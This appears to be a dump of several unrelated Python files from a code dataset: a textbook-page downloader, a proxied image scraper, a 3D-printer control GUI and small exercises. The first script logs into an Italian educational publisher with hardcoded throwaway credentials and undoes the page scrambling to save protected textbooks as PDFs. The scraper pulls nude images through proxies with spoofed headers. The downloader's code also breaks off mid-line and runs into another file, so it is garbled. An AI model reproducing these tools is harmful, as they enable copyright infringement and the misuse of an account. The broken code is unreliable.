(self.fcn8_restore_strategy)\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154289782","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom PIL import Image\nimport PIL\nimport Tkinter\nimport tkMessageBox\nimport requests\nimport re\nimport threading\nimport io\nimport PyPDF2\n\ndef start():\n\tlogbox.delete(0, Tkinter.END)\n\tisbn_entry.configure(state='disabled')\n\tstart_button.configure(state='disabled')\n\tthreading.Thread(target=engine).start()\n\ndef engine():\n\tisbn = isbn_value.get()\n\tif len(isbn)!=12:\n\t\ttkMessageBox.showerror(\"Errore\", \"La lunghezza del codice ISBN deve essere pari a 12!\", icon='error')\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\t\treturn\n\tresult = tkMessageBox.askquestion(\"Conferma\", \"Sicuro di voler scaricare questo libro?\\n\\nISBN: \"+isbn, icon='question')\n\tif result != 'yes':\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\t\treturn\n\n\tdef decrypt(data, page):\n\t\tdata=data.replace('viewer._imgl('+str(page)+',\"','').replace('\");\\nviewer._imgl('+str(page)+');','')\n\t\tdata=data.decode('string_escape')\n\t\tm=\"fb69218f41737d7da84b1e39a949dbc2\"\n\t\tarr=list(data)\n\t\tfor j in range(3):\n\t\t\tfor i in range(95,-1,-1):\n\t\t\t\tnewpos=ord(m[i % 32]) % 96\n\t\t\t\tf=arr[i]\n\t\t\t\ts=arr[newpos]\n\t\t\t\tarr[i]=s\n\t\t\t\tarr[newpos] = f\n\t\tdata=''.join(arr)\n\t\treturn data\n\n\tdef download(username, isbn, pagen):\n\t\tpageid=\"0\"*(3-len(str(pagen)))+str(pagen)\n\t\ttry:\n\t\t\tcontent=session.get(\"http://iflipit.mondadorieducation.it/desktop/index.php?usr=\"+username+\"&iss=\"+isbn+\"&fld=sdf&id=\"+pageid+\"&ext=js\").content\n\t\texcept:\n\t\t\tdownload(username,isbn,pagen)\n\t\t\treturn\n\t\tdata=decrypt(content,pagen)\n\t\tpdf = io.BytesIO()\n\t\tPIL.Image.Image.save(PIL.Image.open(io.BytesIO(data)), pdf, \"PDF\", resolution=100.0)\n\t\tpdf_data[pagen] = pdf.getvalue()\n\t\t\n\tlogbox.insert(Tkinter.END, \"Inizializzazione\")\n\tsession = requests.Session()\n\n\tlogbox.insert(Tkinter.END, \"Login\")\n\temail = \"IxPRCeyG@trashcanmail.com\"\n\tpassword = \"q1w2e3r4\"\n\thtml=session.get(\"https://www.mondadorieducation.it/app/mondadorieducation/login/loginJsonp?username=\"+email+\"&password=\"+password+\"&format=json&jsoncallback=jsonp11\").text\n\t\n\tif not '\"result\":\"OK\"' in html:\n\t\tlogbox.insert(Tkinter.END, \"Login fallito\")\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\t\treturn\n\n\tlogbox.insert(Tkinter.END, \"Recupero informazioni\")\n\tsession.get(\"http://libropiuweb.mondadorieducation.it/mod_connect/login?urlRitorno=http%3A%2F%2Flibropiuweb.mondadorieducation.it%2F\")\n\tusername = re.search('\"username\":\"(.*?)\"',html).group(1)\n\thtml=session.get(\"http://iflipit.mondadorieducation.it/desktop/index.php?accesslevel=st-pl&usr=\"+username+\"&iss=\"+isbn+\"&fil=iss\").text\n\ttry:\n\t\tnpages = int(re.search('\"pagesCount\":(.*?),',html).group(1))\n\texcept:\n\t\ttkMessageBox.showerror(\"Errore\", \"ISBN non valido o non disponibile\", icon='error')\n\t\tlogbox.insert(Tkinter.END, \"ISBN non valido o non disponibile\")\n\t\tisbn_entry.configure(state='normal')\n\t\tstart_button.configure(state='normal')\n\t\treturn\n\n\tlogbox.insert(Tkinter.END, \"Inizio scaricamento delle pagine\")\n\n\tpdf_data = {}\n\n\tpagen=1\n\tsignal = 1\n\twhile 
signal:\n\t\tfor i in range(10-threading.activeCount()):\n\t\t\tif pagen2->5\", \"1->3\"]\n\nExplanation: All root-to-leaf paths are: 1->2->5, 1->3\n\"\"\"\n\nfrom binarytree import build\n\ndef binaryTreePaths(root):\n if root == None:\n return None\n paths = list()\n # get the\n if root.left:\n paths.extend(binaryTreePaths(root.left))\n if root.right:\n paths.extend(binaryTreePaths(root.right))\n l = len(paths)\n # check if this node is a leaf\n if l == 0:\n return [str(root.value)]\n else:\n # for each path string, add the value of this node to the start point\n for i in range(l):\n paths[i] = str(root.value) + \"->\" + paths[i]\n return paths\n\nroot1 = build([1, 2, 3, None, 5])\nprint(root1)\nprint(binaryTreePaths(root1))\n","sub_path":"LeetCode-Python/257 Binary Tree Paths.py","file_name":"257 Binary Tree Paths.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542124322","text":"from cx_Freeze import setup,Executable\r\nimport modules\r\n\r\nincludefiles = ['settings.ini', 'runwithconsole.bat']\r\nincludes = modules.main\r\nexcludes = []\r\npackages = []\r\n\r\ntarget = Executable(\r\n script=\"schedulemaker.py\",\r\n icon=\"icon.ico\"\r\n )\r\n\r\n\r\nsetup(\r\n name = 'schedulemaker',\r\n version = '0.3',\r\n description = 'Trello Schedule Generator',\r\n author = 'Patrick Schmitt',\r\n author_email = '',\r\n options = {'build_exe': {'includes':includes,'excludes':excludes,'packages':packages,'include_files':includefiles}}, \r\n executables = [target]\r\n)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"219024136","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: C8381-Tommy \n\nfibonacci number\n Fn = Fn-1 + Fn-2 \n F0 = 0 and F1 = 1.\n \"\"\" \n \nfib=[]\n\ndef fibonacci(n):\n a,b =0,1\n \n while a<=n:\n print(a,end = \" \")\n a,b = b,a+b\n \nprint(fibonacci(55))\n\ndef fibonacci(n):\n a=1\n b=1\n if n==1:\n print('0')\n elif n==2:\n print('0','1')\n else:\n print(\"fibonacci: \", end=' ')\n print('0',a,b,end=' ')\n for i in range(n-3):\n toplam = a + b\n b=a\n a= toplam\n print(toplam,end=' ')\n print()\n return b\n \nfibonacci(11)","sub_path":"python/try/fibonacci ass_5.py","file_name":"fibonacci ass_5.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"104618645","text":"class Valid_FLAGS(object):\r\n # run test use\r\n test_img_directory = '/home/lzhpc/home/gu/test_b'\r\n test_data_file = '/home/lzhpc/home/gu/test_b/test.csv'\r\n processed_testimg_directory = './preprocess/processed_b'\r\n model_load_dir = './logs_and_weights_add_occlusion_and_fpn'\r\n normalize_img = True\r\n total_num_joints = 24\r\n\r\n total_joints_list = ['neckline_left', 'neckline_right', 'center_front', 'shoulder_left', 'shoulder_right',\r\n 'armpit_left', 'armpit_right', 'waistline_left', 'waistline_right', 'cuff_left_in',\r\n 'cuff_left_out', 'cuff_right_in', 'cuff_right_out', 'top_hem_left', 'top_hem_right',\r\n 'waistband_left', 'waistband_right', 'hemline_left', 'hemline_right', 'crotch',\r\n 'bottom_left_in', 'bottom_left_out', 'bottom_right_in', 'bottom_right_out']\r\n\r\n total_joints_index = ['0-neckline_left', '1-neckline_right', '2-center_front', '3-shoulder_left',\r\n '4-shoulder_right',\r\n '5-armpit_left', '6-armpit_right', '7-waistline_left', 
'8-waistline_right', '9-cuff_left_in',\r\n '10-cuff_left_out', '11-cuff_right_in', '12-cuff_right_out', '13-top_hem_left',\r\n '14-top_hem_right',\r\n '15-waistband_left', '16-waistband_right', '17-hemline_left', '18-hemline_right', '19-crotch',\r\n '20-bottom_left_in', '21-bottom_left_out', '22-bottom_right_in', '23-bottom_right_out']\r\n\r\n blouse_num_joints = 13\r\n blouse_joints_list = ['neckline_left', 'neckline_right', 'shoulder_left', 'shoulder_right', 'center_front',\r\n 'armpit_left', 'armpit_right', 'top_hem_left', 'top_hem_right', 'cuff_left_in',\r\n 'cuff_left_out', 'cuff_right_in', 'cuff_right_out']\r\n blouse_index = [0, 1, 3, 4, 2,\r\n 5, 6, 13, 14, 9,\r\n 10, 11, 12]\r\n\r\n dress_num_joints = 15\r\n dress_joints_list = ['neckline_left', 'neckline_right', 'shoulder_left', 'shoulder_right', 'center_front',\r\n 'armpit_left', 'armpit_right', 'waistline_left', 'waistline_right', 'cuff_left_in',\r\n 'cuff_left_out', 'cuff_right_in', 'cuff_right_out', 'hemline_left', 'hemline_right']\r\n dress_index = [0, 1, 3, 4, 2,\r\n 5, 6, 7, 8, 9,\r\n 10, 11, 12, 17, 18]\r\n\r\n outwear_num_joints = 14\r\n outwear_joints_list = ['neckline_left', 'neckline_right', 'shoulder_left', 'shoulder_right', 'armpit_left',\r\n 'armpit_right', 'waistline_left', 'waistline_right', 'cuff_left_in', 'cuff_left_out',\r\n 'cuff_right_in', 'cuff_right_out', 'top_hem_left', 'top_hem_right']\r\n outwear_index = [0, 1, 3, 4, 5,\r\n 6, 7, 8, 9, 10,\r\n 11, 12, 13, 14]\r\n\r\n skirt_num_joints = 4\r\n skirt_joints_list = ['waistband_left', 'waistband_right', 'hemline_left', 'hemline_right']\r\n skirt_index = [15, 16, 17, 18]\r\n\r\n trousers_num_joints = 7\r\n trousers_joints_list = ['waistband_left', 'waistband_right', 'crotch', 'bottom_left_in', 'bottom_left_out',\r\n 'bottom_right_in', 'bottom_right_out']\r\n trousers_index = [15, 16, 19, 20, 21,\r\n 22, 23]\r\n\r\n","sub_path":"Test/normal _test/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"324732501","text":"import os\nimport requests\nfrom lxml import etree\n\nclass MeiSpider(object):\n\n def img_downloader(self,bin,image):\n if not os.path.exists(\"./meizi\"):\n os.mkdir(\"./meizi\")\n filename = image[-20:].replace(\"/\",\"\")\n with open(\"./meizi/\"+filename,\"wb\") as f:\n f.write(bin)\n print(filename,\"完成写入...\")\n\n\n def get_every_image_url(self,image_list):\n headers = {\n \"host\": \"mm.chinasareview.com\",\n \"connection\": \"keep-alive\",\n \"cache-control\": \"max-age=0\",\n \"upgrade-insecure-requests\": \"1\",\n \"user-agent\": \"mozilla/5.0 (windowS NT 10.0; win64; x64) appLewEbkit/537.36 (KHTML, likE gecko) chrome/67.0.3396.99 safari/537.36\",\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\n \"accept-language\": \"zH-Cn,zh;q=0.9\",\n \"cookie\": \"__jsluid=029e04bcb09ecce884fcd9c7a7fda77d\",\n \"if-none-match\": \"f67cd360b83ed31:108f\",\n \"if-modified-since\": \"fri, 06 oct 2017 15:32:54 GMT\",\n }\n proxies = {\n \"220.191.14.205\": \"6666\",\n \"122.142.232.17\": \"80\",\n \"123.157.206.160\": \"80\",\n \"118.190.95.26\": \"9001\"\n }\n for image in image_list:\n try:\n res = requests.get(image,timeout=60,headers=headers,proxies=proxies)\n except:\n pass\n else:\n print(res.url)\n bin = res.content\n self.img_downloader(bin, image)\n\n\n\n def inner_page_handler(self,link_image):\n res = requests.get(link_image)\n # print(res.url)\n 
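        # The two lines below parse the fetched page with lxml and collect every\n        # img src under div#picture via XPath; a minimal standalone sketch with\n        # hypothetical markup (not from this spider's target site) would be:\n        #   etree.HTML('<div id=\"picture\"><img src=\"a.jpg\"/></div>').xpath(\n        #       '//div[@id=\"picture\"]//img/@src')  # -> ['a.jpg']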
html = res.text\n html = etree.HTML(html)\n image_list = html.xpath('//div[@id=\"picture\"]//img/@src')\n self.get_every_image_url(image_list)\n\n def img_page_handler(self,html):\n html = etree.HTML(html)\n link_image_list = html.xpath('//ul[@class=\"wp-list clearfix\"]/li//h3/a/@href')\n for link_image in link_image_list:\n self.inner_page_handler(link_image)\n\n\n\n def per_page_handler(self,per_page_url):\n res = requests.get(per_page_url)\n # print(res.url)\n html = res.text\n self.img_page_handler(html)\n\n\n def start(self):\n # url = \"http://www.meizitu.com/tag/banluo_5_1.html\"\n page = 4\n url = \"http://www.meizitu.com/tag/quanluo_4_\"\n for pagenum in range(1, page + 1):\n per_page_url= url + str(pagenum) + \".html\"\n # print(per_page_url)\n self.per_page_handler(per_page_url)\n\n\nif __name__ == \"__main__\":\n MeiSpider().start()\n","sub_path":"0705/test01_爬取妹子图图片.py","file_name":"test01_爬取妹子图图片.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"248152765","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nimport sys\r\nfrom PyQt5.QtGui import QPixmap, QColor, QImage\r\n# from Image_Converter import Image_Converter\r\n# from visualization import visualization as vis\r\n# from Ui_MainWindow import Ui_MainWindow\r\n#from subfolder.visualization import visualization as vis\r\n\r\n\r\nfrom subfolder.Ui_MainWindow import Ui_MainWindow\r\nfrom subfolder.Serial_test import Serial_test as Serial\r\nfrom subfolder.Image_Converter import Image_Converter\r\n\r\nimport matplotlib\r\nfrom matplotlib import pyplot as plt\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport subprocess\r\n\r\nimport matplotlib.animation as manimation\r\n#import seaborn as sns\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport mpl_toolkits.mplot3d as M3\r\nimport mpl_toolkits.mplot3d.art3d as art3d\r\n\r\n\r\n#from Serial_test import Serial_test as Serial\r\nimport serial.tools.list_ports\r\nimport threading\r\nfrom functools import partial\r\nimport time\r\n\r\n#import OpenGL.GL as gl\r\n#import OpenGL.GLU as glu\r\n#import OpenGL.GLUT as glut\r\n#import os\r\n\r\nmatplotlib.use('Qt5Agg')\r\n\r\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\r\nfrom matplotlib.figure import Figure\r\nfrom matplotlib.path import Path\r\nimport matplotlib.patches as patches\r\n\r\n# image_converter = Image_Converter() \r\n# image_converter.openfile(r'C:\\Users\\Jimmy\\Desktop\\3D Printing research\\Silcers\\Slic3r\\STL SAMPLES\\spheresmaller5x.svg') \r\n# image_to_send = image_converter.getlayer(10)\r\n\r\nclass Main_PROGRAM(QtWidgets.QMainWindow):\r\n \r\n def __init__(self):\r\n super().__init__() \r\n self.ui = Ui_MainWindow()\r\n self.MainWindow = QtWidgets.QMainWindow()\r\n self.ui.setupUi(self.MainWindow)\r\n \r\n \r\n #self.ui.show()\r\n \r\n self.image_converter = Image_Converter()\r\n \r\n \r\n self.display_layer_counter =0\r\n self.model_layers = []\r\n \r\n self.serial = Serial()\r\n self.connection = 0\r\n \r\n # \" for manual commands\r\n self.statx =0\r\n self.staty =0\r\n \r\n self.done_data = False\r\n self.link_ui()\r\n self.MainWindow.show()\r\n \r\n self.timer = QtCore.QTimer(parent=self)\r\n self.timer.setInterval(1)\r\n self.timer.timeout.connect(self.check_connection)\r\n self.timer.start()\r\n self.tt =0\r\n \r\n \r\n \r\n def link_ui(self):\r\n \r\n 
#self.ui.verticalSlider.setRange(0,len(self.model_layers)-1) #changed\r\n # self.ui.verticalSlider.valueChanged['int'].connect(self.disp_layers)\r\n #self.display_curr_layer(len(self.model_layers),self.display_layer_counter)\r\n # self.ui.verticalSlider.setEnabled(False)\r\n self.ui.slicer.clicked.connect(self.openSlic3r)\r\n \r\n self.ui.print.clicked.connect(partial(self.send_commands,\"print\"))\r\n \r\n self.ui.cancelprint.clicked.connect(partial(self.send_commands,\"cancel\"))\r\n \r\n self.ui.pauseprint.clicked.connect(partial(self.send_commands,\"pause\"))\r\n \r\n self.ui.homebutton.clicked.connect(partial(self.send_commands,\"home\"))\r\n self.ui.testprinthead.clicked.connect(partial(self.send_commands,\"test_printhead\"))\r\n self.ui.movenegx.clicked.connect(partial(self.set_statusX,-1))\r\n self.ui.stopx.clicked.connect(partial(self.set_statusX,0))\r\n self.ui.moveposx.clicked.connect(partial(self.set_statusX,1))\r\n self.ui.movenegy.clicked.connect(partial(self.set_statusY,-1))\r\n self.ui.stopy.clicked.connect(partial(self.set_statusY,0))\r\n self.ui.moveposy.clicked.connect(partial(self.set_statusY,1))\r\n \r\n self.ui.opensvg.clicked.connect(self.openFileNameDialog)\r\n self.ui.layernumb.valueChanged.connect(self.layervalue)\r\n self.ui.uploaddata.clicked.connect(self.upload_data)\r\n \r\n self.ui.print.setEnabled(False)\r\n self.ui.pauseprint.setEnabled(True)\r\n self.ui.cancelprint.setEnabled(True)\r\n self.ui.moveposx.setEnabled(True)\r\n self.ui.testprinthead.setEnabled(True)\r\n self.ui.homebutton.setEnabled(True)\r\n # sns.set()\r\n # fig = plt.figure(figsize=(8.82,5.55),dpi =100,frameon=False) #8,5\r\n# ax = fig.add_subplot(111,projection ='3d')\r\n# t = np.linspace(0, 500, 501)\r\n# ax.set_xlim([0, 150])\r\n# ax.set_ylim([0, 150]) #2125\r\n# # ax.imshow(image_to_send) \r\n# # fig.tight_layout()\r\n# ax.view_init(elev=90, azim=90)\r\n# ax.plot(t, np.tan(t), \".\")\r\n \r\n \r\n# self.ui.LAYER_VIEW2D = FigureCanvas(fig)\r\n# self.ui.LAYER_VIEW2D.figure.canvas.draw()\r\n# self.ui.LAYER_VIEW2D.repaint()\r\n \r\n self._canvas = FigureCanvas(Figure(figsize=(8.7,5.3),dpi =100)) #resolution 3d 8.82,5.55\r\n \r\n #self.ax = self._canvas.figure.add_subplot(111,projection ='3d')\r\n self.ax = self._canvas.figure.add_subplot(111)\r\n t = np.linspace(10, 500, 501)\r\n \r\n# x, y = np.ogrid[0:image_to_send.shape[0], 0:image_to_send.shape[1]]\r\n# ax.plot(image_to_send[:,1],image_to_send[:,0])\r\n# xplot = np.where(image_to_send[:,0] == 1)[0]\r\n# yplot = np.where(image_to_send[:,1] == 1)[0]\r\n# ax.plot(xplot,yplot)\r\n # print(image_to_send[:,0])\r\n# verts = [\r\n# (0., 0.), # left, bottom\r\n# (0., 1.), # left, top\r\n# (1., 1.), # right, top\r\n# (1., 0.), # right, bottom\r\n# (0., 0.), # ignored\r\n# ]\r\n#\r\n# codes = [Path.MOVETO,\r\n# Path.LINETO,\r\n# Path.LINETO,\r\n# Path.LINETO,\r\n# Path.CLOSEPOLY,\r\n# ]\r\n# \r\n# path = Path(image_to_send)\r\n# patch = patches.PathPatch(path)\r\n# ax.add_patch(patch)\r\n self.ax.set_xlim([0, 512]) #2125\r\n self.ax.set_ylim([0, 472]) #2125\r\n # self.ax.set_zlim([0,30])\r\n major_ticks = np.arange(0, 513, 100)\r\n minor_ticks = np.arange(0, 513, 5)\r\n\r\n self.ax.set_xticks(major_ticks)\r\n self.ax.set_xticks(minor_ticks, minor=True)\r\n self.ax.set_yticks(major_ticks)\r\n self.ax.set_yticks(minor_ticks, minor=True)\r\n\r\n # And a corresponding grid\r\n self.ax.grid(which='both')\r\n\r\n # Or if you want different settings for the grids:\r\n self.ax.grid(which='minor', alpha=0.2)\r\n self.ax.grid(which='major', alpha=0.5)\r\n 
#ax.set_zlim([0, 0])\r\n \r\n \r\n # ax.imshow(image_to_send,origin='upper', aspect='auto') \r\n \r\n # fig.tight_layout()\r\n #ax.view_init(elev=-90, azim=-90)\r\n # ax.plot(t, np.tan(t), \".\")\r\n #self._canvas.setFixedSize(800, 490)\r\n #self.ui.LAYER_VIEW2D.setFixedSize(800, 490)\r\n# self._canvas.setSizePolicy(QtWidgets.QSizePolicy.Expanding,\r\n# QtWidgets.QSizePolicy.Expanding)\r\n# self._canvas.updateGeometry()\r\n \r\n #self._canvas.resize(800, 490)\r\n self._canvas.figure.tight_layout()\r\n # print(image_converter.img_getWidth())\r\n# self._canvas2,self.ax2 = vis.create_fig(\"3d\",image_converter.img_getheight(),image_converter.img_getWidth())\r\n# self._canvas2,self.ax2 = vis.draw3d(fig,ax,image_converter.get_model_layers())\r\n bedsizeX = self.ui.bedXaxis.value()\r\n bedsizeY = self.ui.bedYaxis.value()\r\n self._canvas2,self.ax2 = self.create_fig(\"3d\",bedsizeX,bedsizeY)\r\n self._canvas2.setParent(self.ui.view3d)\r\n self._canvas2.draw()\r\n self._canvas1,self.ax1 = self.create_fig(\"2d\",bedsizeX,bedsizeY)\r\n self._canvas1.setParent(self.ui.LAYER_VIEW2D)\r\n self._canvas1.draw()\r\n # self._canvas1.move(-50,-30)\r\n# self._canvas.setParent(self.ui.view3d)\r\n# self._canvas.draw()\r\n #self._canvas.setParent(self.ui.view3d) # was self.ui.LAYER_VIEW2D\r\n # self._canvas.move(-50,-50) #MOVES THE FIGURE 3d\r\n # self._canvas.move(-50,-30) # was -20,-30\r\n# self.ui.LAYER_VIEW2D.setSizePolicy(QtWidgets.QSizePolicy.Expanding,\r\n# QtWidgets.QSizePolicy.Expanding)\r\n # self.ui.LAYER_VIEW2D.updateGeometry()\r\n # self._canvas.setFocusPolicy(QtCore.Qt.StrongFocus)\r\n \r\n # layer_data = image_converter.getlayer_data(10)\r\n \r\n \r\n \r\n # zs = np.linspace(0,2,0.1)\r\n # print(zs)\r\n # for j in range(0,19):\r\n # layer_data = image_converter.getlayer_data(j)\r\n # for i in range(0,len(layer_data)):\r\n \r\n # path = Path(layer_data[i])\r\n # patch = patches.PathPatch(path)\r\n # self.ax.add_patch(patch)\r\n # art3d.pathpatch_2d_to_3d(patch, z=j, zdir='z')\r\n# coll = matplotlib.collections.PatchCollection(patchesx)\r\n# M3.art3d.patch_collection_2d_to_3d(coll, zs, zdir='z')\r\n# self.ax.add_collection(coll)\r\n# self.ax.show()\r\n #self.ax.add_patch(patch)\r\n self.count =5\r\n self.ui.manualON.clicked.connect(self.image_draw) \r\n #ax.imshow(image_to_send[0:i,0:j],origin='upper', aspect='auto')\r\n self._canvas.draw()\r\n # time.sleep(1)\r\n \r\n# dynamic_ax = dynamic_canvas.figure.subplots()\r\n# \r\n# dynamic_ax.plot(t, np.tan(t), \".\")\r\n# \r\n# \r\n# dynamic_canvas.draw()\r\n \r\n # to do clean code , write a write parameter function , test for multiple model loading , off button encoding , set figures and draw3d 2d right\r\n def update_parameters(self,clicked): #clicked to update =1 , first time clicked =0\r\n #self.dpiX = self.ui.Xdpi.value()\r\n #self.dpiY = self.ui.Ydpi.value()\r\n self.CalibX = self.ui.bedXorigin.value()\r\n self.CalibY = self.ui.bedYorigin.value()\r\n self.BedsizeX = self.ui.bedXaxis.value()\r\n self.BedsizeY = self.ui.bedYaxis.value()\r\n self.jetFreq = self.ui.jet_freq.value()\r\n self.motorXResln = self.ui.xmotionresln.value()\r\n self.motorYResln = self.ui.ymotionresln.value()\r\n \r\n def layervalue(self):\r\n self.ui.layernum.setText(\"layer \" +str(self.ui.layernumb.value()) + \"/\" + str(self.image_converter.get_model_layers_numb()))\r\n if self.ui.tab2dview.currentIndex() !=self.ui.tab2dview.indexOf(self.ui.view2d) :\r\n self.ui.tab2dview.setCurrentIndex(self.ui.tab2dview.indexOf(self.ui.view2d))\r\n \r\n def set_statusX(self,statx):\r\n 
self.statx = statx\r\n self.send_commands(\"MMOV\")\r\n def set_statusY(self,staty):\r\n self.staty = staty\r\n self.send_commands(\"MMOV\")\r\n \r\n def send_commands(self,name):\r\n if self.serial.check_connectn():\r\n if name == \"print\":\r\n \r\n self.serial.ser_write(\"START\")\r\n \r\n \r\n if name == \"cancel\":\r\n self.serial.ser_write(\"CANCEL\")\r\n if name == \"home\":\r\n self.serial.ser_write(\"HOME\")\r\n if name == \"pause\":\r\n self.serial.ser_write(\"PAUSE\")\r\n if name == \"MMOV\":\r\n \r\n to_send = \"MMOV,\" + str(self.statx) +\",\"+ str(self.staty)\r\n self.serial.ser_write(to_send)\r\n \r\n if name ==\"test_printhead\":\r\n self.serial.ser_write(\"TEST\")\r\n else:\r\n self.ui.textBrowser.append('Printer is not connected')\r\n \r\n \r\n def checkmsg(self,msg):\r\n print(\"msg her:\" + msg)\r\n if msg == \"\":\r\n self.ui.process.setText(\"Homing\")\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Printing Started\")\r\n self.ui.print.setEnabled(False)\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Process Paused\")\r\n self.ui.print.setText(\"PRINT/CONTINUE\")\r\n self.ui.print.setEnabled(True)\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Process Cancelled\")\r\n self.ui.print.setText(\"PRINT\")\r\n self.ui.print.setEnabled(True)\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Manual Motion Control\")\r\n elif msg == \"\":\r\n self.ui.process.setText(\"Printhead Test\")\r\n \r\n def close_connection(self):\r\n self.serial.disconnect()\r\n \r\n \r\n def check_connection(self):\r\n #print(\"check\")\r\n \r\n if self.serial.connect()== True and self.connection !=1:\r\n self.ui.textBrowser.append('Printer is connected')\r\n self.ui.connectionstatus.setText(\"Connected\")\r\n self.connection = 1\r\n \r\n #return True\r\n# \r\n else:\r\n if self.serial.connect() == False and self.connection != 2:\r\n self.ui.textBrowser.append('Printer is disconnected')\r\n self.ui.connectionstatus.setText(\"Disconnected\")\r\n self.connection = 2\r\n \r\n #return False\r\n if self.serial.connect() ==3 and self.connection !=3:\r\n self.connection =3\r\n self.ui.textBrowser.append('\"Connection could not be established, please reconnect device and restart program\"')\r\n if self.serial.check_connectn() == True: \r\n msg = self.serial.ser_read()\r\n \r\n if(msg):\r\n self.checkmsg(msg)\r\n \r\n def arduino_upload(self):\r\n \r\n arduino_ports = [\r\n p.device\r\n for p in serial.tools.list_ports.comports()\r\n if 'Arduino' in p.description\r\n ]\r\n arduinoProg = \"\\\"C:\\\\Program Files (x86)\\\\Arduino\\\\arduino\\\"\"\r\n \r\n actionLine = \"upload \"\r\n \r\n boardLine = \"arduino:avr:mega\"\r\n portLine = arduino_ports[0]\r\n projectFile2 = \"\\\"\\\\firmware\\\\firmware.ino\\\"\"\r\n arduinoCommand = arduinoProg + \" --board \" + boardLine + \" --port \" + portLine + \" --\" + actionLine + projectFile2\r\n print(\"\\n\\n -- Arduino Command --\")\r\n print(arduinoCommand)\r\n \r\n print(\"-- Starting %s --\\n\")\r\n \r\n presult = subprocess.call(arduinoCommand, shell=True)\r\n \r\n if presult != 0:\r\n #print(\"\\n Failed - result code = %s --\" %(presult))\r\n return False\r\n else:\r\n #print(\"\\n-- Success --\")\r\n return True\r\n def done_upload(self):\r\n self.ui.textBrowser.append('Done uploading')\r\n \r\n self.connection =0\r\n #self.timer = QtCore.QTimer(parent=self)\r\n self.timer.timeout.disconnect(self.done_upload)\r\n self.timer.setInterval(1)\r\n self.timer.timeout.connect(self.check_connection)\r\n self.timer.start()\r\n self.done_data = True\r\n 
self.ui.print.setEnabled(True)\r\n# if self.tt.isAlive():\r\n# print(\"ALIVE\")\r\n# self.tt.join()\r\n def upload_data(self):\r\n if( self.serial.check_connectn()== True and self.image_converter.get_model_layers_numb() >0): #self.serial.connect()== True and\r\n image_numb = self.ui.layernumb.value()\r\n self.ui.layernumb.setEnabled(False)\r\n \r\n self.ui.textBrowser.append('Uploading data...please wait')\r\n image_to_send = self.image_converter.getlayer(image_numb)\r\n self.serial.write_layerdata(image_to_send)\r\n print(\"done writing\")\r\n self.timer.stop()\r\n self.serial.disconnect()\r\n if(self.arduino_upload() == True):\r\n \r\n self.timer.setInterval(30000)\r\n self.timer.timeout.connect(self.done_upload)\r\n self.timer.start()\r\n# self.tt = threading.Timer(30,self.done_upload)\r\n# self.tt.daemon = True\r\n# self.tt.start()\r\n else:\r\n self.ui.textBrowser.append('Upload failed')\r\n else:\r\n if(self.serial.check_connectn()== False):\r\n self.ui.textBrowser.append('Printer is not connected')\r\n if(not self.image_converter.get_model_layers_numb() ):\r\n self.ui.textBrowser.append('No Data')\r\n #self.done_upload()\r\n def image_draw(self):\r\n \r\n self.ax.imshow(image_to_send[0:self.count,0:self.count],origin='upper', aspect='auto')\r\n self._canvas.draw()\r\n self.count = self.count +5\r\n \r\n def openFileNameDialog(self):\r\n options = QFileDialog.Options()\r\n #options |= QFileDialog.DontUseNativeDialog\r\n fileName, _ = QFileDialog.getOpenFileName(self,\"Select Silc3r SVG File\", r'C:\\Users\\Jimmy\\Desktop\\3D Printing research\\Silcers\\Slic3r\\STL SAMPLES',\"SVG Files (*.svg);;All Files (*)\", options=options)\r\n if fileName:\r\n self.ui.textBrowser.append('Model Found & processed')\r\n #print(fileName)\r\n self.done_data = False\r\n self.ui.print.setEnabled(False)\r\n modelname = fileName.split(\"/\")[-1]\r\n modelname = modelname.split(\".\")[0]\r\n self.ui.modelname.setText(modelname)\r\n #return fileName\r\n self.model_layers =[]\r\n self.image_converter.openfile(fileName)\r\n self.model_layers = self.image_converter.get_model_layers()\r\n layer_numbers = self.image_converter.get_model_layers_numb()\r\n #self.ui.verticalSlider.setEnabled(True)\r\n self.ui.layernumb.setEnabled(True)\r\n # self.ui.verticalSlider.setRange(0,layer_numbers)\r\n self.ui.layernumb.setMaximum(layer_numbers)\r\n \r\n self.ax2 = self.draw3d(self.ax2,layer_numbers)\r\n self.ax1 = self.draw2d(self.ax1,0)\r\n self._canvas1.draw()\r\n self._canvas2.draw()\r\n #self.ui.verticalSlider.valueChanged['int'].connect(partial(self.draw2d,self.ax1,self.ui.verticalSlider.value()))\r\n # self.ui.verticalSlider.valueChanged['int'].connect(self.update_2d )\r\n self.ui.layernumb.valueChanged.connect(self.update_2d)\r\n 